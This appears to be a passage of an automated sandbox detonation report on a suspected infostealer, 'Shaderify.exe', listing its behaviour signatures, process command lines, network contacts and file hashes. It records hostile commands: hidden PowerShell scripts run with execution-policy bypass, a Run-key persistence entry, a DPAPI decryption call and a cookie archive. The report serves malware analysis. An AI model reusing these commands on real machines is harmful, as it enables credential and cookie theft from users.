| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,200,52,246,139,142,208,68,160,175,218,80,251,197,138,112,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,218,162,196,100,79,46,247,43,217,118,222,116,251,4,213,64,178,43,144,201,143,84,6,167,161,16,184,2,218,100,6,37,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,89,159,103,187,12,163,9,4,119,168,98,242,147,43,71,19,135,20,13,210,153,26,145,154,126,126,225,90,152,72,193,48,0,0,0,62,121,66,123,38,21,143,132,144,20,232,210,124,88,47,113,66,244,120,173,86,199,149,89,12,113,16,137,6,76,252,198,210,167,186,20,136,163,153,105,122,69,104,179,88,170,105,11,64,0,0,0,107,147,246,161,81,84,201,129,253,138,140,188,66,116,33,146,239,68,29,223,253,252,255,164,100,122,38,103,192,186,98,247,212,97,214,254,62,192,238,229,238,249,192,211,109,103,83,61,3,234,41,120,50,228,215,189,93,49,251,72,228,234,237,149), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,200,52,246,139,142,208,68,160,175,218,80,251,197,138,112,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,218,162,196,100,79,46,247,43,217,118,222,116,251,4,213,64,178,43,144,201,143,84,6,167,161,16,184,2,218,100,6,37,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,89,159,103,187,12,163,9,4,119,168,98,242,147,43,71,19,135,20,13,210,153,26,145,154,126,126,225,90,152,72,193,48,0,0,0,62,121,66,123,38,21,143,132,144,20,232,210,124,88,47,113,66,244,120,173,86,199,149,89,12,113,16,137,6,76,252,198,210,167,186,20,136,163,153,105,122,69,104,179,88,170,105,11,64,0,0,0,107,147,246,161,81,84,201,129,253,138,140,188,66,116,33,146,239,68,29,223,253,252,255,164,100,122,38,103,192,186,98,247,212,97,214,254,62,192,238,229,238,249,192,211,109,103,83,61,3,234,41,120,50,228,215,189,93,49,251,72,228,234,237,149), $null, 'CurrentUser')
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yiuunn7z.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES148B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC148A.tmp"
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1188,13637512085350316135,4677928392725463459,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1204 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1188,13637512085350316135,4677928392725463459,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1616 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1188,13637512085350316135,4677928392725463459,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1344 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | shaderify.xyz | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
Files
\Users\Admin\AppData\Local\Temp\da0c7e02-143d-474d-9be6-e6dcff0d74cf.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
memory/2700-10-0x000000001B530000-0x000000001B812000-memory.dmp
memory/2700-11-0x0000000002910000-0x0000000002918000-memory.dmp
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | 52cc110bb3777aa6bba7900630d4eb49 |
| SHA1 | 3663dc658fd13d407e49781d1a5c2aa203c252fc |
| SHA256 | 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6 |
| SHA512 | 89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab |
\??\c:\Users\Admin\AppData\Local\Temp\yiuunn7z.cmdline
| MD5 | b853a11392267add066748e37bd1059a |
| SHA1 | 983ca4dc4c5595e7bb36a414c3c4c33705012960 |
| SHA256 | 8af06cd156b7867f5c4ddb4f322ae3a5084be22b0a9a8e00dbecdfc5dd128cef |
| SHA512 | 7d27480eea222c77ada289c64f698665d5a5d4f3f0e615ff89f4d016d85c4ab0b92edddaa326f2e82a635a5fca3485439f84be9c026d34946b57dd753b674cd1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d78164ff249c6a75248c9e658466420d |
| SHA1 | fe9e1fc05cd06434260139842c92827fea96a863 |
| SHA256 | bf447616c34c1e62f7b4f3bac2e45ea3cd7c5722a2346c7df4a1c1fad26b1919 |
| SHA512 | f1f980254587c92a1b529812f669a65584557d47f002ae5d90db35c01389a61f288e04a11db6051b2df1fd30d3b0cae6a09a7e5ef00483932c757015fe879fd5 |
\??\c:\Users\Admin\AppData\Local\Temp\yiuunn7z.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
C:\Users\Admin\AppData\Local\Temp\yiuunn7z.dll
| MD5 | c887ac1198786b51fe161467b14552db |
| SHA1 | c7d640d9c53167b66aa899e147f67ed58510f964 |
| SHA256 | 6ea1c0338fee8cfab6c1adef2cd047266a35248c1baeebc6e57697f103012cf2 |
| SHA512 | 9b430bc0b0884f618e9eeb07b326bfc0d4811c9b99b86f54850360474de1b0fb534d9137c996b24276bb49d9e30260a36b1ae7abc281acc8cc8a900bf75406fa |
C:\Users\Admin\AppData\Local\Temp\RES148B.tmp
| MD5 | be5c1091f833d25c9bb9521b87a39b18 |
| SHA1 | 06e3edef9a37957b2584477e1adecea89e35b972 |
| SHA256 | 6174c5ae01b7bd0372fe3dd2f2d135dcb8dca09e6584ccc800027fec6f34a5f3 |
| SHA512 | ee3c87d4d3d935e51acd7cf9bb845971085851b3a596c3f53f1c8bb15d55c2d6ec9308ba697ad1991cf3160a4df21ad2fce1bc4a958ea051c4554b66a2fd0e77 |
C:\Users\Admin\AppData\Local\Temp\yiuunn7z.pdb
| MD5 | 960b7e688c1122b39ae7806ef397e71c |
| SHA1 | f12583e1dc984f2bc8fe9524615a5fe6d8bbf3ca |
| SHA256 | b2c4cbf77c2f05d2957e784c2196254b989e238477c06828b5f20ebdd2187ef3 |
| SHA512 | a398381fb41f1493e3bfd4d622ae74f9c0253f45b0e2a1a3456c6fa843c361a908ad5190842e34c9718631a989fa69ded76963b960b8ff83fa4e686b494125c0 |
memory/2700-33-0x0000000002B60000-0x0000000002B68000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\CSC148A.tmp
| MD5 | 2caf5b867d97fde2fb204a44ea96597b |
| SHA1 | fb0871744ef7c0d68f3b89f451396f815a25efb1 |
| SHA256 | 3432356fa8d820d3f2e6c406617ff23c435878e6bdee9f811d1350e848723dd9 |
| SHA512 | 9ecd7be3370f1b7db63d542e897f03966ca8233f3f343cddb7798b79ec04c2e92f014cd326a62c357dd7fbead66400b0f5667a0ecf509aa6642a2aef1d62cfe7 |
memory/2436-75-0x0000000076E80000-0x0000000076E81000-memory.dmp
memory/2436-43-0x0000000000060000-0x0000000000061000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Admincookies.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
131s
Max time network
154s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3740,i,3724086843943218842,1026644135694712596,262144 --variations-seed-version --mojo-platform-channel-handle=3888 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240215-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 224
Network
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
156s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\swiftshader\libEGL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:50
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
117s
Max time network
127s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240508-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\swiftshader\libEGL.dll,#1
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240426-en
Max time kernel
135s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
120s
Max time network
128s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2512 wrote to memory of 1716 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2512 wrote to memory of 1716 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2512 wrote to memory of 1716 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2512 -s 88
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240508-en
Max time kernel
117s
Max time network
122s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\swiftshader\libGLESv2.dll,#1
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
131s
Max time network
154s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\swiftshader\libGLESv2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
117s
Max time network
132s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1540 wrote to memory of 2024 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 1540 wrote to memory of 2024 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 1540 wrote to memory of 2024 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1540 -s 92
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:50
Platform
win10v2004-20240426-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3636 wrote to memory of 4636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3636 wrote to memory of 4636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3636 wrote to memory of 4636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4636 -ip 4636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
159s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\VTOizUgHSvlseoy.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D91.tmp" "c:\Users\Admin\AppData\Local\Temp\gvzwrytg\CSC560CAE5A71D24B2D88A8B8609B673FC9.TMP"
C:\Windows\system32\cmd.exe
